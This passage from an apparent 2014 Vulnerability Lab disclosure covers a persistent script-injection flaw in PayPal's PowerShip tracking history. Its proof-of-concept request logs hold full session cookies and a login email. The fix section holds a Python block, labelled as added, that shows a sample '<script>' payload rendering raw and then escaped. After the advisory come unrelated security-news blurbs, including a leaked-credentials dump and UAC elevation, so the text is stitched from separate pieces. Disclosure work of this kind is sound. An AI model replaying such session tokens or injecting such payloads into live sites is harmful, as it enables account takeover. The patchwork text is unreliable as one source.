pNTcMTtQfrJuaJiwEnWXQ6yNxfq=ExithdDwKWz2dQXDOUpwmT5khkaByIdeEGJLVsUwz0C7RLrkNi0ZTwwGipIxnBOMQ7IGJ9Akad32iNodKX64o4NdAewdQ4hnP3kq7EKeWoVcnCKix2ChNzbGDpxuCflcnu9uqvlJ1GMvnQeFOkz6SGALAhRX0dEmUlkZcGzrOAxxEik2vbP3V4zy_CbX7dlJtMuChya0ADSViy6T81gqqUicZR8ym8QOfnZP52T1we9-uCQDRLC5pLDMX4iCwJYIVi-Krevn3G7vtlqmn6iSvQDMGnZ-T5y0WwHMg18_5SL3yqerMBwDZrMEUi0VhZg8kVcRlXzvh_0BHai4RNmySI382ToAbAjCKp0K-0; SPARTAJSESSIONID=c133ecf12eeb1]

Note: The request log above shows the pending request of the proof of concept.

1:35:55.409[0ms][total 0ms] Status: 200[OK]
GET https://ship.paypal.com/powership/a Load Flags[LOAD_DOCUMENT_URI  ] Content Size[unknown] Mime Type[unknown]
   Request Headers:
      Host[ship.paypal.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
Referer[https://ship.paypal.com/powership/powership.html?account_number=MBYAX9TQRRXHL]
      Cookie[cwrClyrK4LoCV1fydGbAxiNL6iG=QRBegh2GXJP8UDiCl4vZSNBVWkzTJ5P4YpVgyX4PD9diBigiWteJXVFgYZfEUU1Dykn9t2rpiy0mk1uTcFZWCrQner8nayt7nbpFtxSV1h79WsDQ2xr4TTXIWt0MwpwuN0BU8JGGaeZGrEsdQq8azuaOzIYai_nlt3XZUWSaoXoGRKSaVWGt8RwDbTe-C3wbY9UIviFx2fF20-E9jBwyttVHCNXUvwg_f9v4bK9QJaoEKvi8-CiUQ3Ax9XMsOXSyhv8eGeG7F65MhBuI-9WCufs3_mF8p3wrFb6tatV6ibdxMl17cbTut17A4QwHlX-7phA9vex4fTXwQeqxIIeJru8k4BAdvwCCS-lpYvX7d54qu1GOjheE_qBVtmfGTJIJ2fHSvO5P-C7d_mNAnwA9COYupjN0R6Bf_zhzs8VMY502LbdyVVyCMXlcWIC; KHcl0EuY7AKSMgfvHl7J5E7hPtK=AAYtfgjqYXUmXeBo_oz2EpePBdwSatwwy2CA184Libq2eyMDaPF2NFm02hPAZAYfgQgjv4oeKHQdCBCQ; cookie_check=yes; X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dslingshot%26TIME%3D185732178; LANG=en_US%3bUS; consumer_display=USER_HOMEPAGE%3d3%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1376606276%26FORGOT_BUTTON_ROLE%3d16%26MCE2_ELIGIBILITY%3d2; navcmd=_bulk-ship; navlns=0.0; analytics=uY9I5yYFaS2U.GDQdOTqoE7rLjUprdOGgCHmS.sSPwgptDi1d3j1aQdX.aNPOOp6YGdk3L-9UHQ; SPARTAJSESSIONIDV2=SjWCjq.bmIQPp4lU6PMKQ-xaFh9yTQf-huHCfmsDTrsZbaBzqjQ5osmbJd4HyDYLvVVLg8B1YPkZB0GuBiS9ldzkt-2vmFZAZeH5vFRAvlZiMR8xWnNfkA; s_sess=%20s_cc%3Dtrue%3B%20v31%3Dxpt%252FShipping%252Fshipping%252FLanding%253A%253A_bulk-ship%3B%20s_ppv%3D0%3B%20tr_p1%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%3B%20lt%3D%3B%20s_sq%3D%3B; s_pers=%20s_fid%3D0E94D5F4B2D9C710-2941E70654B1C499%7C1439594764938%3B%20gpv_c43%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%7C1376524564942%3B%20gpv_events%3Dno%2520value%7C1376524564958%3B; ts=vreXpYrS%3D1471193544%26vteXpYrS%3D1376524567%26vr%3D7efa72b41400a491aca05620fffe18d7%26vt%3D7f2278ae1400a4a1c556caf6ff6fb603; login_email=ateeq%40ccure.it; flow_back_cookie=; O5UEnqRkQisOp58l8Yil9bzRrxm=; X-PP-K=1376519887:2:NA; 
HaC80bwXscjqZ7KM6VOxULOB534=ORfX9pdr8ftxc9NyP0TmSJ4B0lSthjOGQCC5APAR7e1eNqnk3WEWcoW8m47mGv-qtCkk_wxTnj2is1B5e2-Kr7_w3FTcxxijAdsyOnXSSh1GN9RvhP0tzJDAlTj7PoC-ZLBPhm; jYNTsouSlksxSbcE1jOBQOPko-K=sIIguAH9hGChn9skMeEk7kMAkbh8NnJGw8uw8Gg2cZDW6RY7p-DHlKFuzzCbwR051WG-vanSiKwnmGt63ezy4id7zhoqSUf-VzVZlUp6Zfj35mOgidWjeovRZ-ndsuIoK4qrVW; ppip_signup=; SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoWiJtY1GnpzN4Y-sixGy7BQ; upct=15; INSIDE_SEARCH_PARAMS=2%3bUS%3ben_US%3bAmerica%2fLos_Angeles; cookie_nav_is_vt_enabled=; cookie_nav_is_uum_enabled=; cookie_welcome=; Apache=10.73.8.155.1376519954817747; RouxWyWiKm3aD3COV0dah-P3yUq=egmP00IA-qk9vuZsjh7DQl8cgxlHKgmoe8i9E323Bp-MpImnx6YHKCB3RXYixNeq7NxdVj9wydXvLMRdleCmTq1OOzw2kpJMwWQObX6lH1RzNcFO; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=ExithdDwKWz2dQXDOUpwmT5khkaByIdeEGJLVsUwz0C7RLrkNi0ZTwwGipIxnBOMQ7IGJ9Akad32iNodKX64o4NdAewdQ4hnP3kq7EKeWoVcnCKix2ChNzbGDpxuCflcnu9uqvlJ1GMvnQeFOkz6SGALAhRX0dEmUlkZcGzrOAxxEik2vbP3V4zy_CbX7dlJtMuChya0ADSViy6T81gqqUicZR8ym8QOfnZP52T1we9-uCQDRLC5pLDMX4iCwJYIVi-Krevn3G7vtlqmn6iSvQDMGnZ-T5y0WwHMg18_5SL3yqerMBwDZrMEUi0VhZg8kVcRlXzvh_0BHai4RNmySI382ToAbAjCKp0K-0; SPARTAJSESSIONID=c133ecf12eeb1]

Note: The last request log shows the execution of the injected script code (payload) in the main `./powership/[x]` index path. The red highlighted login shows the credentials of the session and the researcher account where the proof of concept was demonstrated. The server information and session details are also separately marked in two different colors.


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the tracking id value when the history module renders its table item listing. Restrict the input and filter the request during the verification procedure in the history module itself. Implement exception handling to
prevent further exploitation with the same attack vector.
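The two layers the fix describes, input restriction at verification time and entity encoding at render time, as an added example that is not PayPal's or Vulnerability Lab's code. The tracking-id allowlist pattern, the `render_row_*` helpers and the sample values are assumptions constructed for the demonstration.

```python
import html
import re

# Assumed allowlist for a tracking id (constructed; real carrier formats vary).
TRACKING_ID_RE = re.compile(r"^[A-Za-z0-9 -]{6,40}$")

# Constructed sample values: one plausible id, one carrying stored markup.
SAMPLE_OK = "1Z999AA10123456784"
SAMPLE_MARKUP = '1Z<script>alert("xss")</script>'


def render_row_vulnerable(tracking_id: str) -> str:
    """The pattern the advisory describes: the stored value is interpolated raw."""
    return f"<tr><td>{tracking_id}</td></tr>"


def validate_tracking_id(tracking_id: str) -> bool:
    """Input restriction during verification: only allowlisted characters pass."""
    return bool(TRACKING_ID_RE.match(tracking_id))


def render_row_hardened(tracking_id: str) -> str:
    """Output encoding in the history listing: the value is entity-encoded
    unconditionally, so even a value that slipped past validation earlier
    (or was stored before the fix) is shown as text, never parsed as HTML."""
    return f"<tr><td>{html.escape(tracking_id, quote=True)}</td></tr>"


def accept_tracking_id(tracking_id: str) -> str:
    """Verification step with the exception handling the advisory asks for:
    reject disallowed input instead of storing it for later rendering."""
    if not validate_tracking_id(tracking_id):
        raise ValueError("tracking id rejected: disallowed characters")
    return tracking_id


def find_tainted_rows(rows: dict) -> list:
    """Defender's clean-up check over already stored history entries
    (a {row_id: tracking_id} mapping): ids whose value fails the allowlist."""
    return sorted(row_id for row_id, value in rows.items()
                  if not validate_tracking_id(value))


if __name__ == "__main__":
    print(render_row_vulnerable(SAMPLE_MARKUP))   # markup reaches the page
    print(render_row_hardened(SAMPLE_MARKUP))     # markup is shown as text
    print(find_tainted_rows({1: SAMPLE_OK, 2: SAMPLE_MARKUP}))
```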


Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated as medium(+). The vulnerability can be exploited locally by an attacker with a low privileged user account, but also across multiple user accounts, as in Vulnerability Lab's PayPal bug bounty issue #108. The full remote scenario requires interaction with a client user account; after that interaction the manipulated tracking information becomes visible to both users (attacker and victim).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

73,000 SECURITY CAMERAS VIEWABLE ONLINE DUE TO USE OF DEFAULT PASSWORDS

A website has made 73,011 security cameras from 256 different countries available for viewing online, all by hacking the cameras’ default usernames and passwords.

more here.........http://www.tripwire.com/state-of-security/top-security-stories/73000-security-cameras-viewable-online-due-to-use-of-default-passwords/

We analyze Cryptobot, aka Paycrypt

Recently during some research on encrypting ransomware we came across a new variant that brings some new features to the table. It will encrypt by utilizing the following javascript from being opened as an attachment from email (posing as some document file).

more here..........http://www.webroot.com/blog/2014/11/07/cryptobot/

Nearly 140k emails, u/p leaked from San Diego Zoo

The following leak is brought to you by Paw Security(@PawSecReturns) && #Op4Pawz..

more here.........http://siph0n.in/exploits.php?id=3585

Guest Diary: Didier Stevens - Shellcode Detection with XORSearch

Frank Boldewin (http://www.reconstructer.org/) developed a shellcode detection method to find shellcode in Microsoft Office files, like .doc and .xls files. He released this as a feature of his OfficeMalScanner tool (http://www.reconstructer.org/code.html).

I consider this a very interesting detection method, and wanted to use this method on other file types like pictures. That’s what motivated me to integrate this in my XORSearch tool.

more here...........https://isc.sans.edu/diary/Guest+Diary%3A+Didier+Stevens+-+Shellcode+Detection+with+XORSearch/18929

Global Web Crackdown Arrests 17, Seizes Hundreds Of Dark Net Domains

When “Operation Onymous” first came to light yesterday, it looked like a targeted strike against a few high value targets in the Dark Web drug trade. Now the full scope of that international law enforcement crackdown has been revealed, and it’s a scorched-earth purge of the Internet underground.

more here.......http://www.wired.com/2014/11/operation-onymous-dark-web-arrests/

Warrant for Your Arrest phone scams

Yesterday the scammers tried to hit the wrong victim! Neera Desai works for us at Malcovery Security as a Threat Intelligence Analyst on the malware team. She had received a voicemail on her phone while she was in one of her UAB Computer Science classes and knew that this could be a clue towards something big. She played it for me, and we provided a copy to law enforcement.

more here..........http://garwarner.blogspot.com/2014/11/warrant-for-your-arrest-phone-scams.html

Passive UAC Elevation

I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll.

more here.............http://www.malwaretech.com/2014/11/passive-uac-elevation.html

Exposing Malware In Hidden Desktops Using CmdDesktopSwitcher

Have you ever come across malware that has opened a window that you just can’t see? You suspect it is a case of the malware setting the window as hidden. You fire up WinLister to enumerate the windows in the hopes of finding the hidden window but nothing shows up. If you have ever found yourself in this situation you may be dealing with malware that is hiding in a second desktop. In this article we will walk through the process of identifying extra desktops and switching between them with a new tool called CmdDesktopSwitch.exe.


more here..........http://herrcore.blogspot.ca/2014/11/exposing-malware-in-hidden-desktops.html

How I REVERSE ENGINEERED GOOGLE DOCS To Play Back Any Document’s Keystrokes

If you’ve ever typed anything into a Google Doc, you can now play it back as if it were a movie — like traveling through time to look over your own shoulder as you write.

This is possible because every document written in Google Docs since about May 2010 has a revision history that tracks every change, by every user, with timestamps accurate to the microsecond; these histories are available to anyone with “Edit” permissions; and I have written a piece of software that can find, decode, and rebuild the history for any given document.

more here.........http://features.jsomers.net/how-i-reverse-engineered-google-docs/

Tinfoil Chat

(TFC-CEV) is a high assurance encryption plugin for Pidgin IM client that combines free and open source hardware and software. Secure by design implementation provides a no-compromise layer over the standard and OTR encrypted communication, that addresses automatable attacks used by intelligence agencies for mass surveillance:

more here..........https://github.com/maqp/tfc/tree/cev

Paper: SIGPATH: A Memory Graph Based Approach for Program Data Introspection and Modification

Abstract. Examining and modifying data of interest in the memory of a target program is an important capability for security applications such as memory forensics, rootkit detection, game hacking, and virtual machine introspection. In this paper we present a novel memory graph based approach for program data introspection and modification, which does not require source code, debugging symbols, or any API in the target program. It takes as input a sequence of memory snapshots taken while the program executes, and produces a path signature, which can be used in different executions of the program to efficiently locate and traverse the in-memory data structures where the data of interest is stored. We have implemented our approach in a tool called SIGPATH. We have applied SIGPATH to game hacking, building cheats for 10 popular real-time and turn-based games, and for memory forensics, recovering from snapshots the contacts a user has stored in four IM applications including Skype and Yahoo Messenger.


more here..........http://software.imdea.org/~juanca/papers/sigpath_esorics14.pdf